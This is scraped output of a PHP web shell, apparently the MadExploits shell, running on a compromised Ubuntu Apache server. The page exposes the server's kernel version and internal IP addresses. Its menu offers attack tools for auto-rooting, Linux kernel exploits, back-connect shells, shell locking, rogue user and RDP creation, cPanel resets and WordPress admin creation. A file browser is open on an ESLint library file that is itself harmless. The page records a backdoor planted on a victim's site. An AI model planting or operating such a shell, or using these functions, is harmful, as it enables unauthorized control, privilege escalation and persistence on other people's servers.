Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
eslint /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
cli-engine
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
eslint
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
linter
[ DIR ]
drwxr-xr-x
rule-tester
[ DIR ]
drwxr-xr-x
rules
[ DIR ]
drwxr-xr-x
services
[ DIR ]
drwxr-xr-x
shared
[ DIR ]
drwxr-xr-x
types
[ DIR ]
drwxr-xr-x
api.js
1.57
KB
-rw-r--r--
cli.js
19.65
KB
-rw-r--r--
config-api.js
225
B
-rw-r--r--
options.js
13.78
KB
-rw-r--r--
universal.js
181
B
-rw-r--r--
unsupported-api.js
910
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : unsupported-api.js
/** * @fileoverview APIs that are not officially supported by ESLint. * These APIs may change or be removed at any time. Use at your * own risk. * @author Nicholas C. Zakas */ "use strict"; //----------------------------------------------------------------------------- // Requirements //----------------------------------------------------------------------------- const { FileEnumerator } = require("./cli-engine/file-enumerator"); const { ESLint: FlatESLint, shouldUseFlatConfig } = require("./eslint/eslint"); const { LegacyESLint } = require("./eslint/legacy-eslint"); const builtinRules = require("./rules"); //----------------------------------------------------------------------------- // Exports //----------------------------------------------------------------------------- module.exports = { builtinRules, FlatESLint, shouldUseFlatConfig, FileEnumerator, LegacyESLint, };
Close